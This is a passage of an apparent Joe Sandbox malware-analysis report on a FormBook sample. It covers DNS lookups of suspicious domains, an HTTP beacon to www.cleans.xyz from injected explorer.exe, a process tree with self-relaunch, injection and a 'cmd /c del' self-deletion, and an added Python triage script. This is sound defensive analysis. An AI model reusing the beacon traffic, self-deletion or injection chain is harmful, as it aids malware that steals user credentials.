Jan 10, 2025 15:56:05.415370941 CET | 53 | 60470 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:56:24.624034882 CET | 62995 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:56:24.635730982 CET | 53 | 62995 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:56:45.953701019 CET | 53620 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:57:19.853800058 CET | 62185 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:57:19.869263887 CET | 53 | 62185 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:57:40.172890902 CET | 55690 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:57:40.181510925 CET | 53 | 55690 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:58:00.642061949 CET | 57190 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:58:00.676484108 CET | 53 | 57190 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:58:21.126245975 CET | 53467 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:58:21.233128071 CET | 53 | 53467 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:58:41.690860033 CET | 50549 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:58:41.703843117 CET | 53 | 50549 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:59:02.190272093 CET | 50512 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:59:02.408823967 CET | 53 | 50512 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:59:25.558362007 CET | 58798 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:59:25.568190098 CET | 53 | 58798 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:59:45.713871002 CET | 50501 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:59:45.722445011 CET | 53 | 50501 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:55:43.640054941 CET | 192.168.2.4 | 1.1.1.1 | 0xc1fb | Standard query (0) | www.orean-course-289113002.zone | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:05.405122042 CET | 192.168.2.4 | 1.1.1.1 | 0xd1b6 | Standard query (0) | www.6874.club | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:24.624034882 CET | 192.168.2.4 | 1.1.1.1 | 0xf2e6 | Standard query (0) | www.cleans.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:45.953701019 CET | 192.168.2.4 | 1.1.1.1 | 0x8d1e | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:57:19.853800058 CET | 192.168.2.4 | 1.1.1.1 | 0x321e | Standard query (0) | www.oches-a-credito-es.bond | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:57:40.172890902 CET | 192.168.2.4 | 1.1.1.1 | 0xee32 | Standard query (0) | www.yeloma-treatment-82106.bond | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:58:00.642061949 CET | 192.168.2.4 | 1.1.1.1 | 0x9fcb | Standard query (0) | www.araghospitality.net | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:58:21.126245975 CET | 192.168.2.4 | 1.1.1.1 | 0xf7ed | Standard query (0) | www.ehills.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:58:41.690860033 CET | 192.168.2.4 | 1.1.1.1 | 0x530a | Standard query (0) | www.cskuvq.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:59:02.190272093 CET | 192.168.2.4 | 1.1.1.1 | 0xa05 | Standard query (0) | www.olnacasinotcs14.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:59:25.558362007 CET | 192.168.2.4 | 1.1.1.1 | 0xa9dd | Standard query (0) | www.attoomasteracademy.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:59:45.713871002 CET | 192.168.2.4 | 1.1.1.1 | 0x70dd | Standard query (0) | www.raphic-design-degree-33148.bond | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 15:55:43.649667978 CET | 1.1.1.1 | 192.168.2.4 | 0xc1fb | Name error (3) | www.orean-course-289113002.zone | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:05.415370941 CET | 1.1.1.1 | 192.168.2.4 | 0xd1b6 | Name error (3) | www.6874.club | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:24.635730982 CET | 1.1.1.1 | 192.168.2.4 | 0xf2e6 | No error (0) | www.cleans.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:24.635730982 CET | 1.1.1.1 | 192.168.2.4 | 0xf2e6 | No error (0) | www.cleans.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:56:45.960436106 CET | 1.1.1.1 | 192.168.2.4 | 0x8d1e | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 15:57:19.869263887 CET | 1.1.1.1 | 192.168.2.4 | 0x321e | Name error (3) | www.oches-a-credito-es.bond | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:57:40.181510925 CET | 1.1.1.1 | 192.168.2.4 | 0xee32 | Name error (3) | www.yeloma-treatment-82106.bond | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:58:00.676484108 CET | 1.1.1.1 | 192.168.2.4 | 0x9fcb | Name error (3) | www.araghospitality.net | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:58:21.233128071 CET | 1.1.1.1 | 192.168.2.4 | 0xf7ed | Name error (3) | www.ehills.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:58:41.703843117 CET | 1.1.1.1 | 192.168.2.4 | 0x530a | Name error (3) | www.cskuvq.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:59:02.408823967 CET | 1.1.1.1 | 192.168.2.4 | 0xa05 | Name error (3) | www.olnacasinotcs14.top | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:59:25.568190098 CET | 1.1.1.1 | 192.168.2.4 | 0xa9dd | Name error (3) | www.attoomasteracademy.online | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:59:45.722445011 CET | 1.1.1.1 | 192.168.2.4 | 0x70dd | Name error (3) | www.raphic-design-degree-33148.bond | none | none | A (IP address) | IN (0x0001) | false
• www.cleans.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49868 | 13.248.169.48 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:56:24.644000053 CET | 160 | OUT | GET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW HTTP/1.1
Host: www.cleans.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 10, 2025 15:56:25.112427950 CET | 324 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Fri, 10 Jan 2025 14:56:25 GMT
content-length: 203
connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 75 54 6d 38 6c 3d 73 71 39 45 5a 69 72 79 6e 67 49 59 6c 6c 72 47 47 65 67 53 77 54 50 63 6f 53 65 47 31 77 4b 37 72 39 39 69 41 52 33 76 42 77 42 49 55 75 43 55 6f 68 4f 6d 45 5a 59 62 69 61 73 74 32 6c 41 39 4c 79 41 5a 26 65 4e 39 64 7a 3d 6e 52 2d 34 76 70 57 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW"}</script></head></html>


Target ID:0
Start time:09:55:06
Start date:10/01/2025
Path:C:\Users\user\Desktop\TU0kiz3mxz.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\TU0kiz3mxz.exe"
Imagebase:0x280000
File size:766'976 bytes
MD5 hash:5BC818A30E4D9D8A6BB828767CA1BF2A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:low
Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:09:55:07
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\TU0kiz3mxz.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x320000
                                                                                                                    File size:766'976 bytes
                                                                                                                    MD5 hash:5BC818A30E4D9D8A6BB828767CA1BF2A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:09:55:07
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\TU0kiz3mxz.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:766'976 bytes
                                                                                                                    MD5 hash:5BC818A30E4D9D8A6BB828767CA1BF2A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:09:55:08
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:5
                                                                                                                    Start time:09:55:10
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\explorer.exe"
                                                                                                                    Imagebase:0x3c0000
                                                                                                                    File size:4'514'184 bytes
                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:6
                                                                                                                    Start time:09:55:14
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:/c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x240000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:09:55:14
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:14
                                                                                                                    Start time:09:56:38
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
                                                                                                                    Imagebase:0x7ff635f60000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:15
                                                                                                                    Start time:09:56:40
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:explorer.exe
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false
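The process list above shows the chain a triage analyst looks for in a FormBook run: the sample re-launching itself, a 32-bit explorer.exe started from SysWOW64 that then carries the FormBook Yara hits in memory, and cmd.exe deleting the original file. The following Python script is an added example, not part of the Joe Sandbox report: it encodes those observations as triage rules and runs them over process records constructed from the entries above. The layout assumed for the .sdmp memory-dump names (target, stage, timestamp, base address, protection, then three further fields) and the reading of the protection field as the Windows PAGE_* constants (0x40 = PAGE_EXECUTE_READWRITE) are this example's assumptions, not documented Joe Sandbox semantics.

```python
"""Triage rules over a Joe Sandbox process list (added example).

The process records below are constructed from the report's "Target ID"
entries. The .sdmp name layout and the rules are this example's assumptions.
"""
import re
from dataclasses import dataclass, field

# Assumed .sdmp name layout:
#   target.stage.timestamp.baseaddr.protect.state.type.extra.sdmp
# with `protect` read as a Windows PAGE_* constant.
PAGE_EXECUTE_READWRITE = 0x40
SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class Proc:
    target: int
    path: str
    cmdline: str
    wow64: bool
    yara_sources: list = field(default_factory=list)


SAMPLE = r"C:\Users\user\Desktop\TU0kiz3mxz.exe"

# Constructed from the report's process entries (paths, command lines, Yara sources).
PROCS = [
    Proc(0, SAMPLE, f'"{SAMPLE}"', True,
         ["00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp"]),
    Proc(2, SAMPLE, f'"{SAMPLE}"', False),
    Proc(3, SAMPLE, f'"{SAMPLE}"', True,
         ["00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp"]),
    Proc(4, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE", False),
    Proc(5, r"C:\Windows\SysWOW64\explorer.exe", f'"C:\\Windows\\SysWOW64\\explorer.exe"', True, [
        "00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp",
        "00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp",
        "00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp",
    ]),
    Proc(6, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"', True),
    Proc(7, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False),
    Proc(14, r"C:\Windows\System32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648", False),
    Proc(15, r"C:\Windows\explorer.exe", "explorer.exe", False),
]


def parse_sdmp(name):
    """Split a .sdmp dump name into target, base address and protection; None if it does not fit."""
    m = SDMP_RE.match(name)
    if not m:
        return None
    return {"target": int(m.group(1)), "base": int(m.group(4), 16), "protect": int(m.group(5), 16)}


def triage(procs, sample_path):
    """Return (rule, ...) tuples for every process-tree observation worth escalating."""
    findings = []
    sp = sample_path.lower()

    # Rule 1: the sample image was launched more than once (self re-launch before hollowing).
    relaunch = [p.target for p in procs if p.path.lower() == sp]
    if len(relaunch) > 1:
        findings.append(("self_relaunch", relaunch))

    for p in procs:
        path = p.path.lower()
        cmd = p.cmdline.lower()
        # Rule 2: a 32-bit explorer.exe from SysWOW64 is not a normal shell start; it is the injection host here.
        if p.wow64 and path.endswith(r"\syswow64\explorer.exe"):
            findings.append(("wow64_explorer", p.target))
        # Rule 3: cmd.exe /c del <sample path> deletes the dropper after injection.
        if path.endswith(r"\cmd.exe") and re.search(r"\bdel\b", cmd) and sp in cmd:
            findings.append(("self_delete", p.target))
        # Rule 4: a Yara hit inside a PAGE_EXECUTE_READWRITE region (e.g. a hollowed image at 0x400000).
        for src in p.yara_sources:
            info = parse_sdmp(src)
            if info and info["protect"] == PAGE_EXECUTE_READWRITE:
                findings.append(("yara_in_rwx", p.target, hex(info["base"])))
    return findings


if __name__ == "__main__":
    for finding in triage(PROCS, SAMPLE):
        print(finding)
```

Rule 4 is the one that separates a plain unpacked payload from hollowing: the hit in target 3 sits at base 0x400000 with RWX protection, which is where a replaced process image lands, while the hit in target 0 is in an ordinary read/write heap region.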


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:10%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:139
                                                                                                                      Total number of Limit Nodes:3
                                                                                                                      execution_graph: node and edge dump of the rendered execution graph (figure residue, not reproduced). Win32 API calls named in the graph nodes: DuplicateHandle, CallWindowProcW, CreateActCtxA, GetModuleHandleW.
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 175608bfb173005c63c8cbd04c86ba3a5ff6705bfc2f625de2a600d07a4c848b
                                                                                                                      • Instruction ID: cf77911aa08de4bb68f11ff7c89b848804d393e05d4b846d0c98a3782f3371f4
                                                                                                                      • Opcode Fuzzy Hash: 175608bfb173005c63c8cbd04c86ba3a5ff6705bfc2f625de2a600d07a4c848b
                                                                                                                      • Instruction Fuzzy Hash: 0D21F9B1D056188BEB18CF9BD9457DEFAF7AFC8300F14C16AD409A6294DB7505468FA0
Memory Dump Source
• Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: Te^q$Te^q
• API String ID: 0-3743469327

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: 8bq$8bq
• API String ID: 0-1276831224

Control-flow Graph
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0242AFFE
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 024259D1
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 024259D1
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 04BD4101
Memory Dump Source
• Source File: 00000000.00000002.1708223217.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4bd0000_TU0kiz3mxz.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0

Control-flow Graph
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0242D656,?,?,?,?,?), ref: 0242D717
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

Control-flow Graph
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0242D656,?,?,?,?,?), ref: 0242D717
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0242AFFE
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0242AFFE
Memory Dump Source
• Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8bq
                                                                                                                      • API String ID: 0-187764589
                                                                                                                      • Opcode ID: c686557f9d121daa4c64c229f025e0fd2c7dda83ff34f1ceef40e62571bd6035
                                                                                                                      • Instruction ID: 92fd4b22992998e5a3dcdf61f0aeea725b44fc5bfdf3b340ff61f95281603bb2
